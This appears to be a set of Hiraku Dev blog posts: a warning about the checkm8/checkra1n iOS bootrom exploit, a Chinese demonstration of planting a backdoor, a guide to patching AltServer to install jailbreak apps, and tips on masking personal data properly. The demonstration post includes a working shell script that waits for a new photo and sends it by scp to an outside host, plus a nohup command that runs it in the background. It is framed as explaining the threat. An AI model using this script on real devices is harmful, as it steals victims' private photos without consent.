And few days ago, the first jailbreak tool which based on checkm8 exploit was released, the tool is “checkra1n”.

What’s bootrom exploit? It’s a exploit which is embed in the hardware, which means that it’s impossible to be patched in the future with any software update. And the bootrom exploit checkm8 effects hundreds of million devices. For example, any iPhone released before iPhone XS are effected. Not only iPhones, but also any iPads, iPod touches, Apple Watches, Apple TVs and even HomePods that with specific CPU chips all have this exploit.

Before the checkra1n jailbreak tool released, to steal privacy data from one’s iOS devices, you need to let the victim install spyware with some tricks (like phishing), or get the device physically and patch the passcode. It’s very difficult to bypass the passcode of iOS, even FBI couldn’t hack that before. And for the most serious exploit: “remote jailbreak”, a company even pay $2 million for these kind of vulnerabilities. So you can know that it’s very difficult to monitor a victim’s iOS device before.

After a checkm8 based jailbreak tool (like checkra1n) released, it’s very easy to get any data on effected devices if the attacker can get your iPhone for few minutes, or the attacker even can install malware/spyware on the victim device without any permission/passcode. Although the spyware won’t be work after rebooting the device, we can ask ourselves: “What’s the last time that you rebooted your iPhone?”. For me, once my iPhone stayed on for more than 40 days, so it’s possible to monitor the victim’s device for a long while with one-time attacking.

Currently, you need to connect your device to a Mac computer to jailbreak. However it’s possible to make a small device (dongle) which can run the exploit and steal data automatically. You can imagine, in the future, the attacker can get the victim’s iPhone when he/she go to the toilet and leave the iPhone on the table. And then, attacker just insert a USB-disk like device, which can install malware or get access of victim’s file list without passcode.

To evaluate this, I did an experiment today. I used an iPhone 6s plus and run the checkra1n tool. After jailbreaking successfully, I can see the list files that are stored in these devices, without their passcode.

 

The steps of my experiment:

  1. Restore the iPhone with DFU mode, to iOS 13.2.2
  2. Setup the iPhone without connecting to my computer
  3. Setup iCloud, Touch ID, passcode and Find My iPhone
  4. Install an application from AppStore
  5. Reboot to DFU mode and use checkra1n to jailbreak
  6. No passcode entered for the following steps (7 & 8)
  7. Try to access photos, I found that I can’t read photo data, but I can list them
  8. Try to remount root disk and write a file to root successfully

There are some conclusions from my experiment:

  1. Attackers don’t need to enter passcode and you can list user data directly
  2. Attackers don’t need to trust the connection between iOS device and the computer
  3. Although attackers can’t read user data directly, it’s possible to put malware to root disk
  4. Attackers can list user data (in App sandbox). If you have a document management app and you have a document with sensitive file name, it’s enough for attacker to get some information.
  5. Attackers can wait for next chance, because user data protection only available before entering passcode after rebooting. After the victim unlock his/her device and lock it again, attacker can really read user data without passcode.

 

If you are a very important person like a government officials, or holding very sensitive information, I strongly recommend you to change your iOS device if you are still using effected devices. For every users, if you lost your iOS device, I recommend you just wipe it on iCloud because you never know whether the thief or someone whom get your device would try to access your privacy data or not.

One more thing, the exploit requires your iOS device in a special mode called “DFU mode”, it’s not very possible to get into DFU mode for daily usage. So it’s still safe to use other person’s cables or accessories without “trust” the connection. But once the attacker can get your device physically, your data would be in dangerous. Also, if you trusted the connection between your device and the accessory, it means that you allow the accessory to access your data, no matter the device you use, no matter whether there’s any exploits. So, never click “trust” on your device when you charge your iOS device with a charger which is not yours.

How to protect your data?

  1. If you are very important person whom holding sensitive information, I recommend you upgrade your iOS device to iPhone XS or above
  2. If you go to somewhere and leave your iOS device, please make sure that your device is not rebooted after you come back. Or it might be attacked and the attacker is waiting for you to unlock your device.
  3. When you lost your iOS device, please make sure that you don’t have any file with sensitive file name, or you should wipe your iOS device remotely on iCloud.
  4. Never tap “trust” when you connect any cables or accessories which is not yours.

 

PS. Apple must know the exploit at least about 2 years ago since they patched this on iPhone XS / iPhone XR. But they published new devices with the bottom exploit (iPod touch 7, and the iPad 7th generation which released 2 months (Sep. 2019) before)…

 

Thanks Mowd, Jacob, Garynil lent me their devices, thanks littlesocks for her suggestions of this article, and thanks for Birkhoff Lee for advice of the experiment. This research can’t be done without their help.

Read More

這篇文章 Attackers can get private data from your iPhone without passcode! 最早出現於 Hiraku Dev

iOS checkra1n 越獄受影響裝置之惡意指令快速實作

$
0
0

上篇文章提到,透過 checkra1n,攻擊者將可以輕鬆植入間諜軟體後門。本人基於實驗精神,並且為了解答大部分的人的疑惑:「如何在沒有密碼的情況下可以進行資料盜取」,本文將簡單用 shell script 做一個自動發送照片的後門指令。

首先,必須準備受 checkm8 影響的裝置,以及使用 checkra1n 軟體。

在此範例中,我們要嘗試盜取使用者的照片,但透過 checkra1n 越獄之後,因為在開機後需要輸入一次密碼,後續才可以「讀取」使用者資料,未輸入密碼前只能「列表」使用者資料。所以不知道密碼的攻擊者在這個時候還不能獲得照片資料,但是攻擊者已經可以開始準備後門。

請注意,系統區跟使用者資料區是分開的,在沒有密碼的情況下,攻擊者可以直接寫入系統區的 /tmp 路徑,甚至不需要重新掛載根目錄

所以我簡單寫了一個 shell script:

#!/binpack/bin/bash
while [[ ! -f "/var/mobile/Media/DCIM/100APPLE/IMG_0010.JPG" ]]
do
  ls /var/mobile/Media/DCIM/100APPLE/
  sleep 2
done
echo "ok"
scp -i /var/root/.ssh/id_rsa /var/mobile/Media/DCIM/100APPLE/IMG_0010.JPG hackyour@kinta.ma:/tmp/

假設我們已知受害者目前在手機上已經拍過九張照片,因此下次拍照的檔名會叫 IMG_0010.JPG。所以這個 script 就是每兩秒檢查一下 IMG_0010.JPG 存不存在,不存在的話則繼續等待,一旦檔案存在,就傳送到遠端主機。當然,指令可以不必寫這麼死,可以更彈性地上傳所有相片,不過這邊只是一個簡單的範例而已。

checkra1n 越獄後預設就有 scp 傳送跟接收功能,也有 vim 可以編輯檔案。因此可以把 scp 用到的 ssh key 丟進去手機裡面,由於手機的 ssh 實際上是 dropbear,因此 key 要先自行從 OpenSSH 格式轉換為 dropbear 格式。此外可以使用 vim 把指令寫到 /tmp 裡面。

接著在電腦的終端機( iPhone 沒有解鎖下)輸入指令:

nohup /tmp/hack.sh &>/tmp/hack.txt &

感謝 checkra1n,內建附送我們 nohup 跟 scp 兩個指令,讓我不需要再去自行編譯。下了這個指令之後,我們上面寫的 shell script 就會在背景執行了。

以上就完成了植入惡意指令部分了,接下來只要把手機還給受害者,等待他下一次拍照時,若手機在期間沒有重啟過,因為那時候手機必定是解鎖狀態(受害者用自己密碼解鎖),被入侵的 iPhone 就會自動上傳該照片到我們的伺服器了,收工!

這篇文章 iOS checkra1n 越獄受影響裝置之惡意指令快速實作 最早出現於 Hiraku Dev

怪招:用 AltStore 來安裝越獄用 IPA

$
0
0

在 Cydia Impactor 不能使用之後,很多人開始研究了其他的簽名方法,使得手機可以安裝 unc0ver、chimera 等軟體,但不少方法其實還滿麻煩的,像是要安裝 Xcode 來打包;有些方法則是要信任一些不透明的手機管理軟體,如xx助手之類的。

因此,本文講介紹一個以修改 AltStore 這個軟體的方式,來安裝 unc0ver、chimera 這兩個軟體的方法。

 

使用這個方法的好處:

  1. 非企業簽名,不必擔心對方證書被撤銷
  2. 從官網拉 IPA 自行簽名安裝,不必擔心被加料
  3. 不用安裝xx助手等軟體
  4. 比部分現有方式簡單很多(下載 Xcode 7.3 再打包之類的)

 

使用這個方法的缺點:

  1. 目前只能安裝 unc0ver 3.7.0 b3 跟 chimera 1.3.9 (而且 chimera 我確定能安裝,但不確定是否能越獄成功)
  2. 只能在 Mac 操作
  3. 還是要安裝軟體,只是軟體有開源,相對比較安心(目前最新版本原始碼還沒更新上去)

 

方法如下:

首先,我們要去下載 AltStore 這個軟體,這個軟體有開源,但是最新版還沒放上去,所以目前暫時無法靠自己編譯來達到重新簽名。AltStore 這個軟體本身,是安裝了一個類似 AppStore,只是裡面都放一些不能上架的軟體(如遊戲模擬器),並且會自動重簽名,有興趣的可以自己研究。但我們今天只是要借用他的安裝功能把 IPA 裝上去就好,自動重簽名那些還是靠手機上的 ReProvision 做,所以它的功能在這邊就暫時略過。

下載好之後開啟 DMG,打開發現裡面有一個程式叫「AltServer」。請「務必」把 AltServer 放到系統的 /Application 目錄下。接著「不要打開」AltServer。

接著到這裡下載修改指令,把下載後裡面的東西解壓縮,複製到桌面,叫做 “AltServerPatch.py”。接著打開你的終端機,輸入:

chmod 755 ~/Desktop/AltServerPatch.py

接著再輸入:

python ~/Desktop/AltServerPatch.py

畫面會跳出來問你要 unc0ver 還是 chimera,因為我只測試過 unc0ver 可以順利越獄,chimera 確定可以安裝,但不確定是否可以越獄成功,所以個人是推薦 unc0ver 啦,歡迎白老鼠測試 chimera。

有些人可能猜到原理了,我就是把原本 AltServer 會下載的 IPA 網址換成 unc0ver 跟 chimera 的官網,讓這個工具幫我們安裝我們要的 IPA(如果你想要安裝 yalu 或者 pangu 之類的,請自己更換 AltServerPatch.py 裡面的內容,甚至你可以上傳 IPA 到你自己的空間,再透過修改指令讓 AltServer 幫你簽名安裝你自己的 IPA)。不過由於我們對程式換網址之後會造成程式簽名驗證損毀,所以我們要開啟允許「所有來源」的 App 才可以使用。

開啟所有來源的 App 請參考這篇教學:https://applefans.today/blog/1076061032/

接著,我們可以打開 AltServer 了,它會出現在選單列,畫面如下

▼ 請不要一開始就選 Install AltStore,先選 Install Mail Plug-in

 

▼ 接著打開內建的「郵件」App,然後在偏好設定裡面找到如下的選項,把 AltPlugin.mailbundle 打勾之後套用並重新開啟「郵件」App

 

AltServer 用了奇怪的原理安裝 IPA,所以在安裝期間「郵件」app 必須打開,我沒有詳細研究原因就是了。

▼ 這時候就可以選 Install AltStore 了,選裝置之後會要求你輸入 Apple ID 帳號密碼

 

Apple ID 密碼的部分要注意一下,他要求你輸入原始密碼,如果有兩階段驗證的也是(Cydia Impactor 會叫你去建立一個 App 專屬密碼),如果有安全疑慮的話可以去註冊一個新的 Apple ID 來專門簽名用。安裝成功之後接下來在手機上的操作就跟往常一樣,不多說明。

雖然 AltServer 會常駐在狀態列或者問你要不要開機啟動,但其實我們只要用它這麼一次而已,所以可以直接關掉它不必擔心。

最後補充一些要注意的地方:

  1. 由於下載 IPA 是在電腦進行,所以要確保電腦網路順暢
  2. Chimera IPA 大小高達 100MB 以上,網速太慢有機會 timeout 錯誤,要多試幾次
  3. Chimera 不確定這樣安裝是否可以成功越獄,請有興趣的人測試
  4. AltServer 簽名後,如果要安裝多台機器,請先在第一台機器跑 ReProvision 重新簽名之後再做下一台
  5. 我所提供的指令,IPA 是從官網下載的,如果網路上有人提供其他修改指令,請確保 IPA 來源沒被加料

 

 

補充:

要更換簽名的 IPA,打開 AltServerPatch.py,把 732 開頭的那幾行(應該有 3 行)換掉就好了,然後執行的時候就選 unc0ver。

如果你已經使用過一次 AltServerPatch.py,要替換成別的 IPA 的話,必須把 AltServer 重新複製到 /Application 裡面。(也就是恢復原本的程式先)

放一些常用的越獄 IPA 替換字給大家,後面附註我上傳的就是非官網載點,不信任本人沒加料的請自動迴避。

以下越獄 IPA 沒有測試過,請自行承擔風險(風險頂多就是安裝不成功或者安裝成功之後越獄失敗,不太可能死機或者要重刷)

Pangu(我上傳的):6767696E696E2E64652F6A622F2F2F2F2F2F2F2F4E76776153746F6E652F4E76776153746F6E655F312E312E697061

Phoenix(我上傳的):6767696E696E2E64652F6A622F2F2F2F2F2F2F2F2F2F2F2F2F2F2F50686F656E69782F50686F656E6978352E697061

Home Depot(我上傳的):6767696E696E2E64652F6A622F486F6D654465706F742F2F2F2F2F4D697874617065506C617965725243332E697061

H3lix(官網):68336C69782E7469686D737461722E6E65742F6970612F2F2F2F2F2F2F2F2F2F2F2F68336C69782D5243362E697061

這篇文章 怪招:用 AltStore 來安裝越獄用 IPA 最早出現於 Hiraku Dev

個資保護:如何正確的在敏感資料打馬賽克

$
0
0

看到標題不要笑,真的很多人在貼個人資料的時候用了錯誤的方式打馬賽克,導致資料其實根本就被看光光。像是某前立委公佈某總統候選人電話號碼,還怪別人惡意散布資料(雖然他蠢到遮都沒遮,跟我們講的打馬賽克方式錯誤其實沒有那麼有關)…

下面我會示範幾種常見的錯誤打馬賽克方式,希望大家可以更注意,保護自己的個資安全。

 

第一種:忘記遮掉所有資料

如圖所示,我們看到護照號碼跟身分證統一編號的欄位打了馬賽克沒錯。可是,護照下面那兩行也寫了這些資訊,所以護照號碼是「888800088」,身分證字號是「A234567893」。根本不用吹灰之力就可以看光個資。

 

第二種:模糊程度不夠

嗯不用多說,有眼睛的都看得出來,身分證是「G123456789」,生日是「70/01/01」,對於厲害一點的高手,若已知欄位有哪些可能性(如只有數字),在圖片更模糊的情況下,可以自己重現模糊過後的數字一個一個去比對外型,然後得到接近甚至正確的結果。

 

第三種:你用的是螢光筆

這比較常見於用 iPhone 內建標示工具畫線遮掉資訊的情形,請注意那裡面有一個是螢光筆工具,怎麼畫都還是會有透明的好嗎?「A234567890」,一清二楚。如果要用 iPhone 標示工具遮掉資訊,記得用不透明的那隻筆,然後筆刷選你要的粗細,不要再選到螢光筆了!

 

第四種:可被編輯的 PDF

這種常見於用 macOS 內建的 PDF 編輯軟體來遮掉資訊的情況。上圖看起來是被遮掉資訊的 PDF 沒錯,但是…

用滑鼠去點一下,哇原來是用一個物件遮住啊,把它移走就…

如果要用 PDF 來遮資訊,建議先把那一個畫面先轉圖片,遮掉內容之後,再轉回 PDF 合併(或者你有更好的方法歡迎告訴我)

如果你有 Adobe DC,可以用下面官網介紹的方法:https://helpx.adobe.com/tw/acrobat/using/removing-sensitive-content-pdfs.html

 

第五種:條碼資料

這個最近深坑美食家應該有體會到,不管是發票的 QR Code 還是身分證背面,條碼都是可以掃出資料的,在馬賽克個資的時候不要忘記也把條碼破壞,讓掃描軟體掃不出來。

 

以上就是幾種常見的錯誤打馬賽克方式,希望這樣的範例可以警惕大家,在以後處理有個資相關的畫面或文件時,能夠更加注意。

Read More

這篇文章 個資保護:如何正確的在敏感資料打馬賽克 最早出現於 Hiraku Dev

Viewing all 94 articles
Browse latest View live